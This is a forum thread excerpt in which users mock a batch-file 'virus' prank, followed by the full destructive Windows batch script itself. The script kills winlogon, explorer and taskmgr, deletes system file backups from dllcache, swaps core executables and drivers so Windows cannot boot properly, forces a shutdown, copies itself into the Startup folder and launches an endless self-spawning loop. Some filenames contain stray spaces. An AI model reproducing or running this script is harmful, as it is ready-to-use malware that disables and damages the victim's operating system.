
anonHacker wrote:kazadduum wrote:ya cant call this even a virus. virus infects files. this is not even a destuctive code.
learn c++(and other) and make viruses.fashizzlepop wrote:Honestly. If you go to youtube and put in "computer virus" this will be one of the most common results you will get. THis is one stupid peace of batch code. My advice? Learn advanced batch or another programming language.
I AGREE WITH BOTH OF THESE PEOPLE.
Your prank is that you lock down the PC? C'mon, if that's what you're after, reboot, enter the BIOS, and stick a password on the PC. Now nobody can use the PC without the password.





AtlasDark wrote:I suppose you're asking on how to create a self-propagating virus. The answer is 42.
If you are asking if this is capable of self-propagating, I am astonished.



@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.e xe
del %systemdrive%\windows\System32\dllcache\explorer.e xe
del %systemdrive%\windows\System32\dllcache\services.e xe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.ex e
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
:1
start %0
goto :1
Users browsing this forum: No registered users and 0 guests